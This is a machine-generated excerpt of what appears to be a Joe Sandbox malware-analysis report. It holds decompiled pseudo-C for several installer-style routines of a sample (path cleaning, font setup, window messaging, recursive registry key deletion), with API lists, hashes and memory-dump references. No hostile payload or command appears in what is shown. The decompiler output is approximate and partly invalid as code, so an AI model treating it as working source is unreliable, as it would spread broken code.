                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                  • String ID: %u.%u%s%s$(gD
                                                                                                                                                                                                  • API String ID: 3540041739-492854681
                                                                                                                                                                                                  • Opcode ID: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                  • Instruction ID: aaf23b967d3fcc40b536a7be4f54997d0d4b2484921d6e850771612597014f60
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D11EB73A0412837EB00556DAC45EDF3288EB85374F264237FA66F31D1E979CC5282E8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                  			E0040667C(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405D34(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405CEA(L"*?|<>/\":", _t5))) == 0) {
							E00405E99(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                                                  0x0040667e
                                                                                                                                                                                                  0x00406687
                                                                                                                                                                                                  0x0040669e
                                                                                                                                                                                                  0x0040669e
                                                                                                                                                                                                  0x004066a5
                                                                                                                                                                                                  0x004066b1
                                                                                                                                                                                                  0x004066b1
                                                                                                                                                                                                  0x004066b4
                                                                                                                                                                                                  0x004066b7
                                                                                                                                                                                                  0x004066bc
                                                                                                                                                                                                  0x004066be
                                                                                                                                                                                                  0x004066c7
                                                                                                                                                                                                  0x004066cb
                                                                                                                                                                                                  0x004066e8
                                                                                                                                                                                                  0x004066f0
                                                                                                                                                                                                  0x004066f0
                                                                                                                                                                                                  0x004066f5
                                                                                                                                                                                                  0x004066f7
                                                                                                                                                                                                  0x004066fa
                                                                                                                                                                                                  0x004066ff
                                                                                                                                                                                                  0x00406700
                                                                                                                                                                                                  0x00406704
                                                                                                                                                                                                  0x00406704
                                                                                                                                                                                                  0x00406705
                                                                                                                                                                                                  0x0040670c
                                                                                                                                                                                                  0x0040670e
                                                                                                                                                                                                  0x00406715
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040671d
                                                                                                                                                                                                  0x00406723
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406723
                                                                                                                                                                                                  0x00406728

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                  • CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                  • CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                                                                  • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                  • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                                  			E00401DB9(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C1F(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x41e5d8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x41e5e8 = E00402C1F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x41e5ef = 1;
				 *0x41e5ec = _t15 & 0x00000001;
				 *0x41e5ed = _t15 & 0x00000002;
				 *0x41e5ee = _t15 & 0x00000004;
				E0040640A(_t9, _t31, _t33, 0x41e5f4,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x41e5d8);
				_push(_t18);
				_push(_t33);
				E0040632F();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                                                  0x00401db9
                                                                                                                                                                                                  0x00401dc4
                                                                                                                                                                                                  0x00401dc6
                                                                                                                                                                                                  0x00401dd3
                                                                                                                                                                                                  0x00401dea
                                                                                                                                                                                                  0x00401def
                                                                                                                                                                                                  0x00401dfc
                                                                                                                                                                                                  0x00401e01
                                                                                                                                                                                                  0x00401e05
                                                                                                                                                                                                  0x00401e10
                                                                                                                                                                                                  0x00401e17
                                                                                                                                                                                                  0x00401e29
                                                                                                                                                                                                  0x00401e2f
                                                                                                                                                                                                  0x00401e34
                                                                                                                                                                                                  0x00401e3e
                                                                                                                                                                                                  0x00402592
                                                                                                                                                                                                  0x0040156d
                                                                                                                                                                                                  0x00402a6b
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                  • ReleaseDC.USER32 ref: 00401DEF
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(0041E5D8), ref: 00401E3E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                                                                                  • Opcode ID: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                  • Instruction ID: f94ea66f3bb0d18877d48f50851b2a4d43bd5926543aaa07d49364debbc8af75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A601B575A04240BFF7009BF5AE0A7D9BFB5AB55309F10847DF642B61E2D97840858F2D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00401D5D() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C41(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                                                                                                  0x00401d69
                                                                                                                                                                                                  0x00401d70
                                                                                                                                                                                                  0x00401d9f
                                                                                                                                                                                                  0x00401da7
                                                                                                                                                                                                  0x00401dae
                                                                                                                                                                                                  0x00401dae
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00401D63
                                                                                                                                                                                                  • GetClientRect.USER32 ref: 00401D70
                                                                                                                                                                                                  • LoadImageW.USER32 ref: 00401D91
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                  • Opcode ID: 858355cefed18eb7bc6e0060f1d985c17a5096e6ceee0bed2799ef354eb4a701
                                                                                                                                                                                                  • Instruction ID: c4075bb9bfde8645d9c714665ee228779135434f852c8317c1fe236da41c92b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 858355cefed18eb7bc6e0060f1d985c17a5096e6ceee0bed2799ef354eb4a701
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                                                  			E00401C1F(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C1F(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C1F(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C41(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C41(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C41();
					_t32 = E00402C41();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C1F();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C1F(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E0040632F();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                                                                                  0x00401c1f
                                                                                                                                                                                                  0x00401c21
                                                                                                                                                                                                  0x00401c28
                                                                                                                                                                                                  0x00401c2b
                                                                                                                                                                                                  0x00401c2e
                                                                                                                                                                                                  0x00401c38
                                                                                                                                                                                                  0x00401c3c
                                                                                                                                                                                                  0x00401c3f
                                                                                                                                                                                                  0x00401c48
                                                                                                                                                                                                  0x00401c48
                                                                                                                                                                                                  0x00401c4b
                                                                                                                                                                                                  0x00401c4f
                                                                                                                                                                                                  0x00401c58
                                                                                                                                                                                                  0x00401c58
                                                                                                                                                                                                  0x00401c5b
                                                                                                                                                                                                  0x00401c5f
                                                                                                                                                                                                  0x00401c61
                                                                                                                                                                                                  0x00401cb6
                                                                                                                                                                                                  0x00401cb8
                                                                                                                                                                                                  0x00401cc3
                                                                                                                                                                                                  0x00401ccd
                                                                                                                                                                                                  0x00401cd0
                                                                                                                                                                                                  0x00401cd0
                                                                                                                                                                                                  0x00401cd9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401c63
                                                                                                                                                                                                  0x00401c6a
                                                                                                                                                                                                  0x00401c6c
                                                                                                                                                                                                  0x00401c6f
                                                                                                                                                                                                  0x00401c75
                                                                                                                                                                                                  0x00401c7c
                                                                                                                                                                                                  0x00401c7f
                                                                                                                                                                                                  0x00401ca7
                                                                                                                                                                                                  0x00401cdf
                                                                                                                                                                                                  0x00401cdf
                                                                                                                                                                                                  0x00401c81
                                                                                                                                                                                                  0x00401c8f
                                                                                                                                                                                                  0x00401c97
                                                                                                                                                                                                  0x00401c9a
                                                                                                                                                                                                  0x00401c9a
                                                                                                                                                                                                  0x00401c7f
                                                                                                                                                                                                  0x00401ce2
                                                                                                                                                                                                  0x00401ce5
                                                                                                                                                                                                  0x00401ceb
                                                                                                                                                                                                  0x00402a6b
                                                                                                                                                                                                  0x00402a6b
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageTimeoutW.USER32 ref: 00401C8F
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                  • Opcode ID: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                  • Instruction ID: 177e50295cc88f553b9a3067857c13a37c9039e473aa79b37457755941741264
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97219371948209AEEF05DFB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889809B18
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                                  			E00402D44(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E00406255(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402D44(__eflags, _v8,  &_v532, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004067C2(3);
					if(_t27 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}











                                                                                                                                                                                                  0x00402d4f
                                                                                                                                                                                                  0x00402d58
                                                                                                                                                                                                  0x00402d61
                                                                                                                                                                                                  0x00402d6d
                                                                                                                                                                                                  0x00402d74
                                                                                                                                                                                                  0x00402d98
                                                                                                                                                                                                  0x00402d7e
                                                                                                                                                                                                  0x00402d80
                                                                                                                                                                                                  0x00402dd3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402dd9
                                                                                                                                                                                                  0x00402d8f
                                                                                                                                                                                                  0x00402d94
                                                                                                                                                                                                  0x00402d96
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402d96
                                                                                                                                                                                                  0x00402db2
                                                                                                                                                                                                  0x00402dba
                                                                                                                                                                                                  0x00402dc1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402de6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402dcc
                                                                                                                                                                                                  0x00402df0

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$Enum
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                                                                                  • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                  • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                                  			E004053C4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x446714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x446714 = _t16;
							E00404D9A();
						}
						L11:
						return CallWindowProcW( *0x44671c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404D1A(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004043AB(0x413);
				return 0;
			}





                                                                                                                                                                                                  0x004053c8
                                                                                                                                                                                                  0x004053d2
                                                                                                                                                                                                  0x004053ee
                                                                                                                                                                                                  0x00405410
                                                                                                                                                                                                  0x00405413
                                                                                                                                                                                                  0x00405419
                                                                                                                                                                                                  0x00405423
                                                                                                                                                                                                  0x00405424
                                                                                                                                                                                                  0x00405426
                                                                                                                                                                                                  0x0040542c
                                                                                                                                                                                                  0x0040542c
                                                                                                                                                                                                  0x00405436
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405444
                                                                                                                                                                                                  0x004053fb
                                                                                                                                                                                                  0x00405433
                                                                                                                                                                                                  0x00405433
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405433
                                                                                                                                                                                                  0x00405407
                                                                                                                                                                                                  0x00405409
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405409
                                                                                                                                                                                                  0x004053d8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004053df
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsWindowVisible.USER32 ref: 004053F3
                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                    • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
